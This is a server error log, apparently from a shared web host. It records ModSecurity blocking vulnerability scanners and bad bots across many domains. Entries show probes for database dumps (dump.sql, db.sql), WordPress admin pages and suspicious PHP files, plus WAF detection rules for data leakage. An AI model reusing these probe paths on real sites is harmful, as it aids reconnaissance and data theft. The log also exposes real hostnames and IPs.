[Tue May 26 13:06:19.893566 2026] [security2:error] [pid 485064:tid 485178] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/import.php"] [unique_id "ahVNcz9tlF55stOmSqER2AAAo3E"]
[Tue May 26 13:06:20.074131 2026] [security2:error] [pid 485064:tid 485065] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/tools.php"] [unique_id "ahVNdD9tlF55stOmSqER3AAAuQA"]
[Tue May 26 13:06:20.254758 2026] [security2:error] [pid 485064:tid 485155] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/options-general.php"] [unique_id "ahVNdD9tlF55stOmSqER3QAA5Fo"]
[Tue May 26 13:06:21.192941 2026] [security2:error] [pid 485064:tid 485252] [client 78.46.215.1:27806] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVNdT9tlF55stOmSqESDAAAAL8"], referer: https://thegoodsporting.com
[Tue May 26 13:06:21.558071 2026] [security2:error] [pid 485064:tid 485187] [remote 172.232.108.36:32888] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "208.91.198.85"] [uri "/"] [unique_id "ahVNdT9tlF55stOmSqESGQAAtXo"]
[Tue May 26 13:06:21.576870 2026] [security2:error] [pid 485064:tid 485230] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNdT9tlF55stOmSqESCAAAAKk"]
[Tue May 26 13:06:23.403209 2026] [security2:error] [pid 485064:tid 485084] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/wp-content/uploads/dump.sql"] [unique_id "ahVNdz9tlF55stOmSqESXgAAoBM"]
[Tue May 26 13:06:23.585915 2026] [security2:error] [pid 485064:tid 485090] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/wp-content/uploads/db.sql"] [unique_id "ahVNdz9tlF55stOmSqESZwAA2hk"]
[Tue May 26 13:06:23.878916 2026] [core:crit] [pid 485064:tid 485312] (13)Permission denied: [client 40.77.167.2:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:06:24.071407 2026] [security2:error] [pid 485064:tid 485281] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNdz9tlF55stOmSqESagAAANw"]
[Tue May 26 13:06:24.102113 2026] [core:crit] [pid 485064:tid 485216] (13)Permission denied: [client 40.77.167.2:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:06:24.162041 2026] [security2:error] [pid 485064:tid 485117] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-cron.php"] [unique_id "ahVNeD9tlF55stOmSqEShAAAtzQ"]
[Tue May 26 13:06:25.453415 2026] [security2:error] [pid 485064:tid 485258] [client 74.7.230.21:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "afstpaul.org.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVNeT9tlF55stOmSqESrwAAAMU"]
[Tue May 26 13:06:25.453923 2026] [security2:error] [pid 485064:tid 485273] [client 74.7.230.21:58858] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "afstpaul.org.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVNeT9tlF55stOmSqESrAAA1CU"]
[Tue May 26 13:06:26.189243 2026] [security2:error] [pid 485064:tid 485229] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNeT9tlF55stOmSqESvAAAAKg"]
[Tue May 26 13:06:26.366944 2026] [security2:error] [pid 485064:tid 485248] [client 74.249.173.207:4351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/admin.php"] [unique_id "ahVNej9tlF55stOmSqESzQAAALs"]
[Tue May 26 13:06:27.463799 2026] [security2:error] [pid 485064:tid 485085] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/xmlrpc.php"] [unique_id "ahVNez9tlF55stOmSqES6QAAixQ"]
[Tue May 26 13:06:27.626090 2026] [security2:error] [pid 485064:tid 485288] [client 74.249.173.207:4741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVNez9tlF55stOmSqES9AAAAOM"]
[Tue May 26 13:06:27.937191 2026] [security2:error] [pid 485064:tid 485318] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNez9tlF55stOmSqES8QAAAQE"]
[Tue May 26 13:06:29.517413 2026] [security2:error] [pid 485064:tid 485094] [remote 172.232.108.36:50438] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "208.91.199.245"] [uri "/"] [unique_id "ahVNfT9tlF55stOmSqETNwAA8R0"]
[Tue May 26 13:06:30.057772 2026] [security2:error] [pid 485064:tid 485257] [client 161.38.224.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNfT9tlF55stOmSqETPgAAAMQ"]
[Tue May 26 13:06:30.465423 2026] [security2:error] [pid 485064:tid 485214] [client 216.244.66.241:44806] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVNfj9tlF55stOmSqETYQAAAJk"]
[Tue May 26 13:06:30.465574 2026] [security2:error] [pid 485064:tid 485214] [client 216.244.66.241:44806] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVNfj9tlF55stOmSqETYQAAAJk"]
[Tue May 26 13:06:30.465634 2026] [security2:error] [pid 485064:tid 485258] [client 216.244.66.241:44814] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVNfj9tlF55stOmSqETYgAAAMU"]
[Tue May 26 13:06:30.465754 2026] [security2:error] [pid 485064:tid 485258] [client 216.244.66.241:44814] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVNfj9tlF55stOmSqETYgAAAMU"]
[Tue May 26 13:06:31.067458 2026] [security2:error] [pid 485064:tid 485215] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNfj9tlF55stOmSqETaAAAAJo"]
[Tue May 26 13:06:31.740550 2026] [security2:error] [pid 485064:tid 485308] [client 172.98.32.29:45995] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVNfj9tlF55stOmSqETXQAAAPc"]
[Tue May 26 13:06:33.581030 2026] [security2:error] [pid 485064:tid 485205] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNgT9tlF55stOmSqETvwAAAJA"]
[Tue May 26 13:06:35.229633 2026] [security2:error] [pid 485064:tid 485245] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNgj9tlF55stOmSqET-QAAALg"]
[Tue May 26 13:06:37.955765 2026] [security2:error] [pid 485064:tid 485266] [client 20.104.227.76:4534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/wk/index.php"] [unique_id "ahVNhT9tlF55stOmSqEUdQAAAM0"]
[Tue May 26 13:06:38.323195 2026] [security2:error] [pid 485064:tid 485197] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNhT9tlF55stOmSqEUcgAAAIg"]
[Tue May 26 13:06:39.693434 2026] [security2:error] [pid 485064:tid 485274] [client 20.104.227.76:17566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahVNhz9tlF55stOmSqEUtgAAANU"]
[Tue May 26 13:06:40.491498 2026] [security2:error] [pid 485064:tid 485219] [client 74.249.173.207:4307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/cache.php"] [unique_id "ahVNiD9tlF55stOmSqEU3AAAAJ4"]
[Tue May 26 13:06:40.642350 2026] [security2:error] [pid 485064:tid 485239] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNiD9tlF55stOmSqEUzQAAALI"]
[Tue May 26 13:06:41.004076 2026] [security2:error] [pid 485064:tid 485297] [client 69.164.217.245:35107] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "162.215.241.212"] [uri "/index.php"] [unique_id "ahVNiD9tlF55stOmSqEU7AAAAOw"]
[Tue May 26 13:06:41.165605 2026] [security2:error] [pid 485064:tid 485109] [remote 172.232.108.36:19414] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "208.91.198.65"] [uri "/"] [unique_id "ahVNiT9tlF55stOmSqEU9gAAoSw"]
[Tue May 26 13:06:41.489950 2026] [security2:error] [pid 485064:tid 485241] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNiT9tlF55stOmSqEU_AAAALQ"], referer: https://www.anujtradingco.com/
[Tue May 26 13:06:42.241197 2026] [security2:error] [pid 485064:tid 485282] [client 57.141.2.49:22891] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVNiD9tlF55stOmSqEUxwAA3Sk"]
[Tue May 26 13:06:42.253381 2026] [security2:error] [pid 485064:tid 485318] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNij9tlF55stOmSqEVHgAAAQE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285277&moderation-hash=4e0d83967d61716d2f3f85439cb6c2c2
[Tue May 26 13:06:42.302969 2026] [security2:error] [pid 485064:tid 485283] [client 114.119.153.38:32249] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ameritradeng.com"] [uri "/"] [unique_id "ahVNij9tlF55stOmSqEVJQAAAN4"], referer: https://www.ameritradeng.com/
[Tue May 26 13:06:42.435923 2026] [security2:error] [pid 485064:tid 485232] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNij9tlF55stOmSqEVFwAAAKs"]
[Tue May 26 13:06:44.440909 2026] [security2:error] [pid 485064:tid 485285] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNjD9tlF55stOmSqEVfwAAAOA"], referer: https://anujtradingco.com
[Tue May 26 13:06:44.643271 2026] [security2:error] [pid 485064:tid 485205] [client 74.249.173.207:4322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/themes.php"] [unique_id "ahVNjD9tlF55stOmSqEVigAAAJA"]
[Tue May 26 13:06:44.745770 2026] [security2:error] [pid 485064:tid 485272] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNjD9tlF55stOmSqEVfAAAANM"]
[Tue May 26 13:06:47.164885 2026] [security2:error] [pid 485064:tid 485223] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNjj9tlF55stOmSqEV9QAAAKI"]
[Tue May 26 13:06:49.397186 2026] [security2:error] [pid 485064:tid 485290] [client 74.249.173.207:4315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/an.php"] [unique_id "ahVNkT9tlF55stOmSqEWVwAAAOU"]
[Tue May 26 13:06:50.263215 2026] [security2:error] [pid 485064:tid 485286] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNkT9tlF55stOmSqEWaQAAAOE"]
[Tue May 26 13:06:52.318296 2026] [security2:error] [pid 485064:tid 485320] [client 74.7.241.180:54834] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.karuppuswamykovil.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVNlD9tlF55stOmSqEWzwABAwM"]
[Tue May 26 13:06:52.398524 2026] [security2:error] [pid 485064:tid 485248] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNkz9tlF55stOmSqEWuwAAALs"]
[Tue May 26 13:06:52.522996 2026] [security2:error] [pid 485064:tid 485187] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/ipn.php"] [unique_id "ahVNlD9tlF55stOmSqEW1gAAqXo"]
[Tue May 26 13:06:53.243753 2026] [security2:error] [pid 485064:tid 485246] [client 20.104.227.76:8273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVNlT9tlF55stOmSqEW_AAAALk"]
[Tue May 26 13:06:54.532253 2026] [security2:error] [pid 485064:tid 485307] [client 172.224.240.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVNlj9tlF55stOmSqEXKgAAAPY"]
[Tue May 26 13:06:56.644798 2026] [security2:error] [pid 485064:tid 485237] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNmD9tlF55stOmSqEXeQAAALA"]
[Tue May 26 13:06:56.790191 2026] [security2:error] [pid 485064:tid 485304] [client 20.104.227.76:4513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/function/function.php"] [unique_id "ahVNmD9tlF55stOmSqEXlwAAAPM"]
[Tue May 26 13:06:56.857602 2026] [security2:error] [pid 485064:tid 485291] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNmD9tlF55stOmSqEXhAAAAOY"]
[Tue May 26 13:06:57.212733 2026] [security2:error] [pid 485064:tid 485200] [client 149.56.150.79:47135] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "thriveswift.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXpAAAizo"]
[Tue May 26 13:06:57.585545 2026] [security2:error] [pid 485064:tid 485298] [client 149.56.150.79:47135] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "thriveswift.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXvwAA7SA"]
[Tue May 26 13:06:57.670432 2026] [security2:error] [pid 485064:tid 485283] [client 42.105.199.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXqgAAAN4"]
[Tue May 26 13:06:57.726200 2026] [security2:error] [pid 485064:tid 485306] [client 149.56.150.79:47135] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "thriveswift.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXwwAA9QI"]
[Tue May 26 13:06:57.867198 2026] [security2:error] [pid 485064:tid 485309] [client 149.56.150.79:47135] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "thriveswift.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXxQAA-C4"]
[Tue May 26 13:06:58.025664 2026] [security2:error] [pid 485064:tid 485320] [client 149.56.150.79:47135] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "thriveswift.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXzgABAyQ"]
[Tue May 26 13:06:59.675274 2026] [security2:error] [pid 485064:tid 485246] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNmz9tlF55stOmSqEYBgAAALk"]
